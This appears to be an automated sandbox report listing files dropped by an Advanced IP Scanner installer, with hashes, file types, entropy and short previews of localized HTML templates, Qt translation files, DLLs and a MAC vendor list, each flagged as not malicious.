                                                                                                                      SHA-512:D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1155
                                                                                                                      Entropy (8bit):4.85707182260681
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                      MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                      SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                      SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                      SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28669
                                                                                                                      Entropy (8bit):4.635479137963866
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
                                                                                                                      MD5:A5D24342E9B32AD9714C091BB135D180
                                                                                                                      SHA1:7B193290CFE8190B60122C2219972512695E5D68
                                                                                                                      SHA-256:2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
                                                                                                                      SHA-512:140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......*L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK.*.y.....*.y.....*.%..&..*.0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V...*..R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1256
                                                                                                                      Entropy (8bit):5.1672203710221565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
                                                                                                                      MD5:38E55188530EE1FC3B88A22697957911
                                                                                                                      SHA1:BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
                                                                                                                      SHA-256:EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
                                                                                                                      SHA-512:F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):29651
                                                                                                                      Entropy (8bit):5.330350785151233
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
                                                                                                                      MD5:E1A891010B901FE6055532E588E20293
                                                                                                                      SHA1:167F62B548D6628FC1B989F6FD232BD362B59C23
                                                                                                                      SHA-256:B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
                                                                                                                      SHA-512:AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K..*.y...,.*.y.....*.%..'..*.0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1153
                                                                                                                      Entropy (8bit):4.788912446448768
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
                                                                                                                      MD5:FBA663967DF5DD4AB38D38DA1362598E
                                                                                                                      SHA1:9557B768C03EB179FDEBB5F74724985F51685203
                                                                                                                      SHA-256:466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
                                                                                                                      SHA-512:427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21282
                                                                                                                      Entropy (8bit):5.593895866111406
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
                                                                                                                      MD5:6885AC8F42A02A32B59AA84D330925C3
                                                                                                                      SHA1:A070B4B8BF1128197681487D332168A537107FB9
                                                                                                                      SHA-256:2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
                                                                                                                      SHA-512:4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3..*.y.....*.y.....*.%.....*.0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):6.960788331628294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                                                      MD5:37DA7F6961082DD96A537235DD89B114
                                                                                                                      SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                                                      SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                                                      SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26514
                                                                                                                      Entropy (8bit):5.365287004508335
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
                                                                                                                      MD5:31966D909B8293307AC3545ACA55CD13
                                                                                                                      SHA1:1B49E43C0109445BA5068E2ED8422CB308D99B12
                                                                                                                      SHA-256:81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
                                                                                                                      SHA-512:7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3*...e..Um......U.......... =...A..*.y.....*.y...9.*.%.."..*.0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T..*...2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24768
                                                                                                                      Entropy (8bit):6.784463110154403
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                                                      MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                                                      SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                                                      SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                                                      SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1614189
                                                                                                                      Entropy (8bit):5.107077482480661
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
                                                                                                                      MD5:7B844618B571CDACB552622844639A96
                                                                                                                      SHA1:3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
                                                                                                                      SHA-256:8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
                                                                                                                      SHA-512:9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
                                                                                                                      Malicious:false
                                                                                                                      Preview:000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18112
                                                                                                                      Entropy (8bit):7.072469017642331
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
                                                                                                                      MD5:FDF0B4BF0214585E18EE2F6978F985B0
                                                                                                                      SHA1:0FE247F8CCA0C04729135EE612FBFCED92D59D9D
                                                                                                                      SHA-256:CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
                                                                                                                      SHA-512:D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):6.993015464813673
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
                                                                                                                      MD5:FC68978ABB44E572DFE637B7DD3D615F
                                                                                                                      SHA1:47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
                                                                                                                      SHA-256:DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
                                                                                                                      SHA-512:7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2080
                                                                                                                      Entropy (8bit):4.902799949328129
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
                                                                                                                      MD5:64D0C8B9E985CFD51786E85509000617
                                                                                                                      SHA1:65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
                                                                                                                      SHA-256:F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
                                                                                                                      SHA-512:DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):23348
                                                                                                                      Entropy (8bit):5.657948878761793
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
                                                                                                                      MD5:EFD6D076AAD193007E77BFA1BB46E3DA
                                                                                                                      SHA1:92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
                                                                                                                      SHA-256:2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
                                                                                                                      SHA-512:11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9..*.y.....*.y...i.*.%.....*.0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):282664
                                                                                                                      Entropy (8bit):6.463228483563671
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
                                                                                                                      MD5:BA337B8D1BC9F117F7605A2B79B10064
                                                                                                                      SHA1:9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
                                                                                                                      SHA-256:EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
                                                                                                                      SHA-512:277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):300584
